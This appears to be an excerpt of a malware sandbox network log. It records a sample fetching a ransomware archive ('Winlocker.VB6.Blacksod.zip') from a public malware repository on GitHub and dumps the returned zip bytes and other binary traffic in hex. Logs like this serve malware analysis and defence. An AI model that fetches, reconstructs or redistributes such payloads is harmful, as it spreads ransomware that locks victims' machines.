                                                                                                                                                2022-09-29 12:48:53 UTC2494INData Raw: 74 c2 fc e1 42 fd c9 85 48 c3 70 8b 97 f7 df 97 a0 e4 b0 60 73 79 20 d3 fd 37 3c f1 00 4e a3 a0 a0 c1 dc a4 44 43 9a 19 74 fe 9d 23 07 6e 22 63 f0 2b 59 1d 99 9b 0a 3a c2 94 53 41 23 dd dd 06 81 6a fd 6b de ff c2 10 d9 27 c1 d8 55 50 e8 ad 53 90 a7 68 fd bf cd 3a 49 81 06 20 56 57 27 cc 19 44 62 08 a7 46 99 c1 35 56 16 96 b0 9f 1b db 8c 19 20 4e 07 66 17 4e bc 89 58 0c 1f 17 47 fd f1 f9 0e 0d d3 03 25 c1 38 99 89 5a 28 df 89 d0 04 d5 ea 58 d9 1e 55 ff 80 59 0f d8 a1 a4 99 6c 1a 6f 5b 40 31 3e 0f ad d2 d0 3c 82 b6 21 bf 1e 0b c5 a8 a4 be d3 15 7d c7 98 cf e9 80 5e 87 67 bc 16 3e 2f 62 80 f6 9e 41 3b 93 5d db 58 58 ea 7b c1 cd 76 1e 06 f7 32 4a 02 ee e0 29 1c 90 69 31 99 72 df c8 f9 9e 69 86 0a 75 0e 65 b7 d5 d0 b7 a9 1b de 05 be 20 49 15 27 e0 d0 1d a2 d3
                                                                                                                                                Data Ascii: tBHp`sy 7<NDCt#n"c+Y:SA#jk'UPSh:I VW'DbF5V NfNXG%8Z(XUYlo[@1><!}^g>/bA;]XX{v2J)i1riue I'
                                                                                                                                                2022-09-29 12:48:53 UTC2510INData Raw: fb 76 98 3d 60 51 e8 b7 63 3e a2 c6 21 e7 08 88 b4 84 54 30 6d 83 f5 3f a3 d1 31 43 a7 53 b0 f1 23 c6 86 6d b9 29 ac 55 3a d4 34 2d 56 63 de 79 ab ee 44 29 83 19 5d a4 13 c9 e4 b9 f8 5c d8 da db c2 84 b6 f7 b5 fc b1 88 b2 dd 28 fb 1d ea 6c 85 22 be d2 f1 c1 63 be b0 06 e1 a7 49 a1 b1 b9 03 c2 09 6a 02 fa db 51 1e 46 4d 2e 8a b1 29 2b 82 f7 89 de 17 2b 91 3e 7e c4 e9 de 92 3e a8 25 d4 6b 75 b9 3a 94 04 47 c1 ed 1b 1c 32 f0 6b 61 88 2b de e6 ac 9a 5a fc 8c a0 17 09 a9 dd cf b0 40 03 5a ba 0c cf 7f 62 4e 01 ed 60 41 b2 c1 e4 c7 d1 17 8a 79 cd ce 0f f7 1f 3b 40 27 e8 e4 c6 4f 5d ee 67 6f bb 89 22 38 0a ce b2 4d cc 23 b8 03 65 3b 76 73 00 98 b2 7e d1 3b ec 99 a5 a8 cb cd 0d c9 79 05 2c 72 72 23 03 ce 81 cf e3 18 81 5c 22 ce 89 4b 75 08 12 d9 ea bb 50 84 a2 03
                                                                                                                                                Data Ascii: v=`Qc>!T0m?1CS#m)U:4-VcyD)]\(l"cIjQFM.)++>~>%ku:G2ka+Z@ZbN`Ay;@'O]go"8M#e;vs~;y,rr#\"KuP
                                                                                                                                                2022-09-29 12:48:53 UTC2526INData Raw: cc 73 56 cb ab 35 3a 4e 13 d5 93 0f c8 7a 4a d8 8e 7f 77 4f 77 7b c5 67 15 66 b9 a2 1c ca cd e7 b4 ff 25 a1 35 69 73 13 2f 45 a5 6e e8 a3 48 fe 88 19 61 ca d4 dd dc 62 f8 80 a4 80 80 d5 75 7e 8c f1 88 75 e9 ec 07 0e 15 8c 34 dc ef b7 a2 9c 83 60 38 ee aa cb 96 8c 77 77 d5 a8 4e 8a 1e 4c f3 49 4f de 0e d7 2e c6 07 99 ef 77 f6 20 8c ba 8e b5 28 80 ff 03 53 de b3 8a 47 98 bf 8c df 01 52 34 ec 07 23 66 5e da 81 e1 ea 13 44 ca d9 45 2c 74 ce 4c 61 2d 79 51 67 d7 45 e7 ce f0 4e 70 81 fb af 1d f5 f9 45 4e e3 88 bc 31 08 db ce a6 ea 76 f5 f3 36 e2 af 83 92 31 ff 49 db 30 db 0e 21 38 b8 77 8f 0b 9d 86 ab 87 b6 9c ff f2 bc f3 22 95 32 a4 8e 09 55 79 be bc f6 a4 fb 3b 67 a8 9e 85 76 0e 6d 03 8a 5c ff c0 9e e4 7a 0c 23 22 42 f6 a2 95 e0 dd 4a 84 46 ef 31 eb e0 85 ea
                                                                                                                                                Data Ascii: sV5:NzJwOw{gf%5is/EnHabu~u4`8wwNLIO.w (SGR4#f^DE,tLa-yQgENpEN1v61I0!8w"2Uy;gvm\z#"BJF1
                                                                                                                                                2022-09-29 12:48:53 UTC2542INData Raw: 08 86 b9 42 95 71 31 15 40 85 43 c7 6b f3 df 62 2d 90 eb 9f 3f cc 07 bc 9f ea 03 eb 45 3e 67 9e ca f6 e4 69 9c de de 0d 51 82 ec cb da e0 11 43 f4 22 f8 c4 49 c7 59 d3 a5 24 14 7a a8 8d 1d b7 67 85 32 7d 6c 8d 9a de 10 70 4c c1 04 d5 cf 19 f3 f7 e8 85 a8 83 bb 8a 3d 14 8c 1a d9 73 f8 d2 e2 c5 a2 0f 4d 68 79 fc af c3 9f e3 c4 5d f3 90 3f b0 d1 34 ad 33 cd a1 1c 31 5c 5c 02 02 c2 fd 26 f3 e9 82 57 0c dd b2 b7 e7 47 a6 74 86 2e b4 99 22 29 25 2f ec 2a 17 01 ae 67 81 40 e8 24 dd 88 c3 8e 20 8c 56 97 f9 39 3e 31 26 b0 e9 19 b5 f5 73 02 b3 ac 04 dd 90 17 e0 63 dc 49 43 0e 57 86 b6 22 38 41 82 01 19 41 df 1a 9a 2f 22 4e 08 d3 92 8b 3e 51 2e 1d e0 b3 fc c3 21 f5 a0 3e 6b 75 49 85 3d b5 67 bf eb 18 56 14 3f 09 db 09 05 6b 0e 92 f1 fb 51 e6 da 75 89 51 80 3f ef 53
                                                                                                                                                Data Ascii: Bq1@Ckb-?E>giQC"IY$zg2}lpL=sMhy]?431\\&WGt.")%/*g@$ V9>1&scICW"8AA/"N>Q.!>kuI=gV?kQuQ?S


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                44192.168.2.349721140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:59 UTC2545OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                45140.82.121.4443192.168.2.349721C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:59 UTC2545INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:59 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:59 UTC2546INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                46192.168.2.349722185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:59 UTC2548OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                47185.199.108.133443192.168.2.349722C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:59 UTC2548INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1654828
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "048f16ec26fac96976b1d3967107c01ab62f85a71c9ea224a0004e0d9a310bb0"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 080E:67BF:7859E0:85F3A6:63359349
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:59 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6935-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455739.482006,VS0,VE2
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 082d0d7214f24f9f9aeeb383ee1129b87f0e235e
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:59 GMT
                                                                                                                                                Source-Age: 242
                                                                                                                                                2022-09-29 12:48:59 UTC2549INData Raw: 50 4b 03 04 14 00 01 00 08 00 f3 be f1 48 70 46 04 a5 60 3f 19 00 a8 52 26 00 23 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 69 6e 6c 6f 63 6b 65 72 56 42 36 42 6c 61 63 6b 73 6f 64 2e 65 78 65 13 82 84 12 45 39 75 df 15 b3 b4 e2 21 6a 25 fe e2 9e 52 e9 6c c4 4d 37 be 49 97 0a e4 f2 fd eb 82 6d 18 d5 dc f8 b7 12 1f da 01 13 ab a0 f2 8f d0 d0 78 27 00 cb db a6 6f d4 d9 32 0a f0 dc 60 ea bc 46 55 7d 13 2c c3 9a eb 73 98 44 49 93 e0 7c 6a 2c b3 7a 58 78 41 93 99 06 42 b1 7f 75 47 eb a4 a1 79 e6 80 ed 12 91 76 8a 64 fa 6a 78 eb ca c2 0b 70 df 58 a4 d6 63 ef 69 89 6c 2f 21 e9 cc b1 31 b4 cb 54 d9 00 5f de 7a 30 fd 13 6f 15 0f 9f 11 13 bb 23 ca 41 c6 c0 64 41 22 da 3b 27 45 e9 8b 13 90 51 e3 7f 46 e2 bc 4a 84 7f 16 f7 35 b5 58 21 8e 7e 6c 9b dd 9e a3 99 c4 07
                                                                                                                                                Data Ascii: PKHpF`?R&#Endermanch@WinlockerVB6Blacksod.exeE9u!j%RlM7Imx'o2`FU},sDI|j,zXxABuGyvdjxpXcil/!1T_z0o#AdA";'EQFJ5X!~l
                                                                                                                                                2022-09-29 12:48:59 UTC2565INData Raw: 93 0e 8a 9d 7a 5d 41 66 e8 0c d0 8a 87 d0 c5 22 eb 81 4f c4 e6 45 13 76 43 99 57 ee c9 24 60 09 2a 38 a8 8e 6d 73 22 b5 32 d1 c2 82 53 1f e4 45 80 36 94 d6 e6 b4 3e 80 38 36 33 af 71 ea 1c 8d 3d 38 8f 15 6b 54 12 a7 dd 65 0b bb cf d4 29 6c 07 3f 71 cb 89 8c fa 9c 52 15 6e 07 76 55 9c 8b 95 81 f2 15 49 24 e5 08 f4 3b 24 26 06 7b 8c 35 92 a7 00 13 c4 fa 61 40 1c ef 2c 82 22 67 cc 7d aa b7 ba 39 c5 b2 f4 f3 d7 e5 77 2f 6e c9 7d 57 97 18 8c 3d b3 26 69 94 a4 92 77 59 59 90 ba e4 bb be f8 eb 74 6a 7d dd 8f 4f 46 d9 61 6d 60 69 a9 d0 84 e9 6d a4 63 e7 be 20 c8 84 b2 46 5a 99 df 0b b6 50 0a 37 c3 8e 25 10 2f 07 6d cb 28 09 52 94 a4 a8 6c cc 70 21 38 86 4e 3f 17 f2 1c 31 2b 96 e9 6a a8 ac 0d 3d 67 fd 61 56 3a d6 82 eb aa e6 52 80 1d 7a eb fe ef d1 34 7f 69 bd 18
                                                                                                                                                Data Ascii: z]Af"OEvCW$`*8ms"2SE6>863q=8kTe)l?qRnvUI$;$&{5a@,"g}9w/n}W=&iwYYtj}OFam`imc FZP7%/m(Rlp!8N?1+j=gaV:Rz4i
                                                                                                                                                2022-09-29 12:48:59 UTC2581INData Raw: f8 37 2a 1c b8 fe 86 c3 62 c1 fa 42 12 4b f0 ce a0 62 55 e6 02 3a f1 09 21 e1 90 90 1d fe 70 ae 20 5a 41 a7 11 00 46 6f bf bb 39 51 dd 4b 6d d7 7c d7 28 c4 54 af 60 41 25 a6 e7 fa 1a f6 32 a1 ee 98 e2 de a3 9d d9 da 7c 0e 1a 79 8a 0c 25 aa a7 7f 54 26 e2 72 36 b9 b4 30 91 0b b6 18 c6 7d c9 2b a3 74 eb 73 e6 93 a0 8f 2f 5b df fb 44 bc 35 33 ba d7 bd 77 4f 5a 10 0a f1 f3 88 09 32 39 fd 67 89 e2 ea 36 02 c4 27 f3 0d f2 ad 32 23 8d ae 3b 46 a6 0b 9a 8c 2b 55 ef b3 e9 c9 bd b6 a3 d3 db 1b 6c 76 3f f5 24 0a d4 46 b5 77 d3 6c 4f b7 af d1 cb a2 07 13 21 9e 23 9f ba e4 f8 9c 11 bd 11 da 65 7a a8 88 3b 86 dd 3f 4c 7a 93 aa 53 16 63 72 5d 1d 8a 9d 25 d7 99 f3 f5 b2 59 b0 51 d4 7b 24 ac 13 0d 54 d1 2a 68 6b b8 d5 32 c5 39 1e b5 48 0a ec ea 32 44 1d 1a 1e 5f 11 0a 22
                                                                                                                                                Data Ascii: 7*bBKbU:!p ZAFo9QKm|(T`A%2|y%T&r60}+ts/[D53wOZ29g6'2#;F+Ulv?$FwlO!#ez;?LzScr]%YQ{$T*hk29H2D_"
                                                                                                                                                2022-09-29 12:48:59 UTC2597INData Raw: 87 2f b5 2d 82 20 f5 98 f7 40 d5 a2 0c 25 a2 aa 04 7b c4 7b 58 fe 52 be 46 66 cb d4 6f a9 86 02 e7 9b d5 71 d6 6d 2b 8c 60 2c 03 92 e7 a7 6c 43 9f eb 87 59 65 fb 0f ab bc c4 67 c1 6e 8a e5 a5 ab 84 92 0d f1 62 ac 56 e5 3b 46 6d 4d f1 d7 df 7e 49 81 86 3e e0 18 f4 76 8f d0 4e 1b 6f af 69 25 07 95 b3 05 95 4a 44 d4 86 5f 44 70 9a 99 79 0d f3 ad 9e 2e 0d 9f c7 53 01 94 cc a8 03 2e c3 e0 91 59 3d 3a 72 84 3f f4 62 85 a5 79 f0 82 38 64 77 fa b9 f7 3b 11 37 d9 a3 42 e6 10 99 48 90 bf f8 85 04 e5 12 9e bc fe d2 21 5e ab 8b 7c 16 6f 2e dd ec 68 66 bd 15 4c 8f 1f d9 9e 8d 22 83 23 b3 24 03 a9 be 82 2b 1b f5 d5 a6 cb 3c ec 0e 25 76 7a ac de a9 cf 73 43 7d 0c eb 6c 80 38 c0 d2 3e b2 0d 3c 1d a5 cc 2a d1 98 77 ef aa 27 cc d1 8c 2d e5 7a 61 96 f5 04 af 26 45 83 b1 e0
                                                                                                                                                Data Ascii: /- @%{{XRFfoqm+`,lCYegnbV;FmM~I>vNoi%JD_Dpy.S.Y=:r?by8dw;7BH!^|o.hfL"#$+<%vzsC}l8><*w'-za&E
                                                                                                                                                2022-09-29 12:48:59 UTC2613INData Raw: 0e a7 3b 8c db 2c 21 e7 70 c4 c9 b4 17 64 2b ae e5 4b f6 34 1a af a1 9a f9 32 fe f9 8d b7 ab 44 06 61 80 8f 66 aa 59 5a 5d 6f 12 0d b1 d7 f0 68 27 e4 0d 4d fe 47 6f 3f f3 e6 32 30 a5 2a 39 79 b1 7b 2f 2a a0 04 9d a5 69 59 9d 3f ac 1e c5 48 db d0 b0 dd 95 a8 9b 47 16 e9 9a 9c 6d 88 d1 a2 91 a1 88 40 bf 93 ba 6b e5 51 6e 3f 6f 89 81 42 ac 4e 9f 37 95 3c 75 e4 89 4e eb 1d 6f c6 c6 1f fc 4d 42 58 8e b1 fd 2e be ab 73 5a 8d c4 9c 7c 68 49 0b 32 a0 1d 31 ff 81 9a 8a 1a 65 e2 20 ef 2e 3e c5 a6 e3 db 55 80 40 12 38 df 4d 7c 8b 72 a3 3d df 2c 0b 4d 63 e5 34 6f 11 2e bc 0d 2f 50 48 7e 3d 78 63 87 ee 52 27 a2 e0 34 87 b0 55 73 8b 8d d8 92 a0 2f 20 af d0 9f bc 67 c7 26 1a 3a be 4e 86 c8 ca 89 5a 63 99 06 83 04 e6 e1 11 d7 43 a2 52 6d c5 90 fe 52 42 48 59 56 0d d0 24
                                                                                                                                                Data Ascii: ;,!pd+K42DafYZ]oh'MGo?20*9y{/*iY?HGm@kQn?oBN7<uNoMBX.sZ|hI21e .>U@8M|r=,Mc4o./PH~=xcR'4Us/ g&:NZcCRmRBHYV$
                                                                                                                                                2022-09-29 12:48:59 UTC2629INData Raw: 9a e7 a3 65 9b 39 ac 6f 87 38 fe e9 81 69 5a 95 c5 37 90 f3 28 35 05 e8 ec ed 84 e5 3e 9b 79 a3 90 24 e9 be 72 99 2a b4 e9 d7 44 89 ab d7 0a ff af 58 82 2e 08 db 36 21 fe 55 94 31 ab db eb d4 f4 76 22 45 08 6e 5e ac ac 59 b0 63 5b 6b dd 2f 2e 99 c3 8b 5f 45 e8 31 8e 33 ed 5e f8 3a 2a 2f 96 ee 44 da 64 2b c7 72 11 83 11 f8 cd c8 53 c9 ad ad 62 68 b3 ab 57 02 a4 55 6d ca 52 2c c7 39 eb 28 4c b3 8d e1 cf 25 06 8b 2c 69 67 07 27 6a 6b 99 b3 cf 20 13 b3 a5 d9 86 f0 ba 3e b8 cc d6 49 99 60 ea 72 73 b6 05 e3 74 8c 17 30 a6 a8 a1 26 d1 7b 02 aa 65 13 02 f1 5a a7 75 d6 e0 d7 57 17 71 88 26 f8 e7 54 37 11 c1 e6 23 24 c3 78 a2 3c e3 08 3f 00 5c fe cd 99 be 81 00 88 1e 68 7b a7 39 ec da 2f 23 4a ed a4 cb a1 a0 4d 93 61 39 5d e1 42 fd 27 09 7f 89 b5 7e 85 59 7f 13 3e
                                                                                                                                                Data Ascii: e9o8iZ7(5>y$r*DX.6!U1v"En^Yc[k/._E13^:*/Dd+rSbhWUmR,9(L%,ig'jk >I`rst0&{eZuWq&T7#$x<?\h{9/#JMa9]B'~Y>
                                                                                                                                                2022-09-29 12:48:59 UTC2645INData Raw: b0 8f 23 02 cf 11 97 d3 1c a9 f2 3e 71 ac fe ba d0 89 69 11 4a e4 1f 7c 73 c6 6d a8 34 0f 7e c7 1e 39 32 ea 0c a0 b7 ed dc f6 cd f7 4d 3f 45 65 56 3d d2 83 8e a5 a5 ab 88 c4 a4 94 c5 e0 50 b2 a1 3b af 36 87 b4 db 83 cb a2 e4 d4 cd bf ba d6 d1 77 5f 09 29 af b8 63 84 15 41 31 40 e2 f6 9f 2c 25 6d 15 c4 d1 0d f0 bb 39 85 87 11 f2 c7 c0 03 0c df 94 34 fb 20 d1 e7 7e 15 06 c2 2e 06 aa fb 21 a8 49 83 63 98 a2 83 b7 dd 4d 00 44 d3 17 13 00 c6 40 68 10 99 62 9b c9 8c 8a eb 96 48 fa 2c db e4 64 b0 00 b5 c0 bc e3 68 7f 7f 0e 69 7d a1 a2 4e 19 14 fe fe 67 25 e7 31 c7 7c 30 eb b7 00 ea 26 b8 cf 89 ec 6e a2 57 e9 14 9d 69 3f a9 85 34 55 14 cb aa 48 49 04 56 a2 ff cd ce 0a 33 21 28 97 f6 dc 79 4c 6f b1 5a 63 e1 98 d1 7c 01 9b d8 9d c5 74 d7 6f b9 ce 18 f5 7c c0 7b 74
                                                                                                                                                Data Ascii: #>qiJ|sm4~92M?EeV=P;6w_)cA1@,%m94 ~.!IcMD@hbH,dhi}Ng%1|0&nWi?4UHIV3!(yLoZc|to|{t
                                                                                                                                                2022-09-29 12:48:59 UTC2661INData Raw: ab 4c d4 c2 36 a9 28 0e b7 c0 da 4f 9b d5 c5 13 65 a8 a3 95 06 2a e6 c9 63 9d f7 37 1d dc f6 30 c8 a1 c9 e6 e0 b6 e7 d6 50 e6 8a 90 01 dc e1 8e 45 4a fc e1 a8 58 50 55 b4 7b 6e e2 b8 e9 7f 2a 51 2c 69 98 94 25 7f 62 c4 c1 b4 4b b5 0c 01 80 18 43 1c 50 de 01 ed 27 27 96 25 3d cb 86 ea 87 98 78 dd b3 84 6e 53 97 dd 7a 9b 29 72 a5 44 93 82 cd cf 3f 0b 4a bc ac 00 88 c5 65 1c 15 93 5f 55 84 b7 56 34 76 7a ba 41 b3 54 ea dc b8 38 08 45 7a c6 da da 79 97 7f 9c 15 80 a5 43 1c 40 be c8 d7 8e 8a 3f 0c fd 85 c0 17 71 91 1e e5 d0 8e d5 3f 50 8e d9 a0 a5 8c b1 9c 59 2a 40 fe 2a c5 fe a1 83 ad c7 70 b8 86 83 9b 9b 3c 53 3d a0 70 7d cb cc 6a 0c 74 9a 06 ed fc e6 cb f1 60 f7 fd 24 19 50 1d 99 d4 30 87 b9 24 72 fb f9 97 e7 31 de 17 10 23 e8 3a f1 a7 cc 29 22 7d da c9 b6
                                                                                                                                                Data Ascii: L6(Oe*c70PEJXPU{n*Q,i%bKCP''%=xnSz)rD?Je_UV4vzAT8EzyC@?q?PY*@*p<S=p}jt`$P0$r1#:)"}
                                                                                                                                                2022-09-29 12:48:59 UTC2677INData Raw: dd 2e 9a ef 6b 4e 52 ec f7 f2 8d b7 d4 58 99 2e 04 0f cd 26 4e 67 b9 f0 05 80 33 f9 4b 6e 25 62 05 19 ae 2e c1 9c 64 ab 66 f1 88 98 c1 d8 bc 67 84 93 d6 c4 3d 26 1a 9a a3 9b b7 9a 62 5a e5 1e 63 67 3d fe 48 fa 4c 4a fd 0c 7f 75 b7 a3 39 e7 d4 29 67 ed df 03 4c ba 13 e7 47 9b 28 d9 01 69 d4 f8 79 81 fc 01 ed ce dc 7d 76 f9 88 84 34 56 e9 0f 54 b9 df cb d5 4a 43 70 c2 50 44 98 3e c2 7c 8d 30 0c 39 15 9e b1 a2 54 41 01 19 81 99 3b ad 29 31 c3 d2 27 ca db b8 66 02 8d ef 37 fc 02 91 9c 0e 50 5f 32 b6 24 30 12 08 f4 0a 07 37 08 86 0a fa b9 ef d8 e3 5a 4b db 31 b3 66 a3 50 3a cc b7 19 78 d2 97 33 a0 27 e7 79 3a b4 fb b3 ab 79 3a f7 ea 74 cc 92 f8 f0 e7 d8 03 4f 64 7e ae ac 19 74 b7 e0 e6 34 71 9e 2e ca 5b ff cc 15 44 fc 94 7f 2d ac e2 a8 2c 84 d3 32 f7 7d 4c 5f
                                                                                                                                                Data Ascii: .kNRX.&Ng3Kn%b.dfg=&bZcg=HLJu9)gLG(iy}v4VTJCpPD>|09TA;)1'f7P_2$07ZK1fP:x3'y:y:tOd~t4q.[D-,2}L_
                                                                                                                                                2022-09-29 12:48:59 UTC2693INData Raw: 2b a9 cb 58 2e 55 39 ab d0 4d 1a ee 53 d1 60 79 17 dc 1a a8 d1 a8 0b 7b d3 74 f8 b2 8d a0 ce bc 08 1e c3 67 92 c4 ce d0 7c 0b 9e 62 77 8b 94 e0 71 d2 38 90 88 38 a1 fd ec 08 09 f4 dd 54 7e f7 e6 ec d2 e2 b2 d9 1b d5 9e 9f 3f 46 6d 8a ba d6 5d 96 b1 d0 f6 af 6d 87 d6 ca e4 b1 07 86 1d 73 0e ee 60 b8 6b 03 18 86 77 b8 f7 bf 8b 2f 95 6a e5 c2 a0 00 73 8d 96 83 ca 4a 92 ef a5 fa ab df 3e d4 c0 b6 ba 49 2f d8 a4 96 1c 1a 09 9f 20 6f 67 83 a7 ef 2f ac 2b 06 47 14 3d 3d 41 3a 78 11 2f 82 5b e1 dc 11 f2 56 77 08 dc bc 40 39 f2 2d b3 bc 3a 71 35 04 1d 75 e3 3b 9f e5 cd 0f de b6 08 8b d6 63 d6 9e d4 69 e9 89 64 e3 98 6b f7 34 bd 61 55 47 31 c7 e9 47 ca a7 9a c0 97 d5 52 b0 25 4e 69 d5 1f 40 4a 89 ab 5b 7b 2d 2d 24 91 e7 9e ec 0f 6c 32 4a 92 c2 a7 34 9e 37 12 28 bc
                                                                                                                                                Data Ascii: +X.U9MS`y{tg|bwq88T~?Fm]ms`kw/jsJ>I/ og/+G==A:x/[Vw@9-:q5u;cidk4aUG1GR%Ni@J[{--$l2J47(
                                                                                                                                                2022-09-29 12:48:59 UTC2709INData Raw: f0 e2 5a 79 0b 65 a3 58 28 93 3b 4c 87 e7 9d 71 fb 04 db 6a 93 f7 79 5e 86 77 d2 d9 71 16 21 c0 17 f6 e7 c2 1b 29 6a d2 4f 58 5c f8 bc 91 78 fd a9 43 c9 14 b5 92 a0 b9 56 37 1c 0a a8 02 8c 37 ed bd 31 f5 98 67 1f a7 fb 14 61 a1 67 71 34 4d ac d1 68 38 00 1a d6 06 8e a2 9c 17 72 b4 c7 17 02 d5 b1 4b f5 c2 78 1e 46 d8 9e 00 f3 89 a9 fb 1b fd c9 ab b3 35 d1 54 31 66 84 30 d7 d5 c7 75 a1 e5 29 b3 45 d3 d5 19 7e 5f 85 3a 28 71 a9 9d b4 ea 56 81 2c 6d fe c3 d0 4b 20 d7 38 07 b4 44 31 92 33 2f 98 f1 09 d0 d0 f9 2c ad 45 0b 93 6f cf bd a7 e4 a4 b1 de 23 8c e1 a4 b3 75 53 e8 66 9b e0 91 60 f7 6a 8e 14 cb 57 73 1b c3 a7 97 15 7b 82 40 d5 e9 c4 51 f9 4e eb cd 98 5c d5 8e 89 d5 62 71 b0 76 9e a5 18 66 34 6a 06 77 b5 2e eb eb 8d 58 e2 9c 4d fd 87 b9 00 66 dd f7 48 d9
                                                                                                                                                Data Ascii: ZyeX(;Lqjy^wq!)jOX\xCV771gagq4Mh8rKxF5T1f0u)E~_:(qV,mK 8D13/,Eo#uSf`jWs{@QN\bqvf4jw.XMfH
                                                                                                                                                2022-09-29 12:48:59 UTC2725INData Raw: d9 c6 fc ba 3d be b3 5a d0 7f 61 6e 34 83 54 42 c5 bb 22 67 a7 fe 58 45 e6 df f2 e8 32 7c 2d 30 a8 e8 fb fb 11 e0 35 3e d9 5a fa e4 db 6f 71 df 53 71 67 7e 30 49 67 30 96 a0 aa a2 b6 c9 16 a4 36 10 16 cd ad 20 b6 ff 11 0e 24 4e 02 2a a0 b8 8b 94 a3 c7 72 03 59 ce 47 64 27 b1 c8 8f 00 73 ab b8 2c 52 81 11 15 97 53 c6 de 63 1b c4 e8 d2 01 da ab 42 db a1 da 5e 2b 01 57 a4 36 80 6d 73 70 18 43 2d 5a a4 2f b7 79 13 45 c9 97 01 a3 4e cb 90 fb c1 6d b9 f8 74 72 87 3f d8 b1 3f f5 91 bc 32 ed 99 d1 52 92 1a 41 27 6a 19 1c cb b1 2f 41 79 2b 40 bd 53 c0 d0 f6 3a ea e8 d6 71 6b 8e 82 54 9c 0f e5 64 10 20 02 5c d7 21 99 38 80 47 22 f8 65 e1 8b 37 49 c0 b4 0a 0b 16 d0 ee 29 89 86 35 11 70 33 00 88 fa 0b 34 de 23 0b 1c ea f1 62 d1 76 93 40 93 04 f0 73 1b 5c ac c5 34 09
                                                                                                                                                Data Ascii: =Zan4TB"gXE2|-05>ZoqSqg~0Ig06 $N*rYGd's,RScB^+W6mspC-Z/yENmtr??2RA'j/Ay+@S:qkTd \!8G"e7I)5p34#bv@s\4
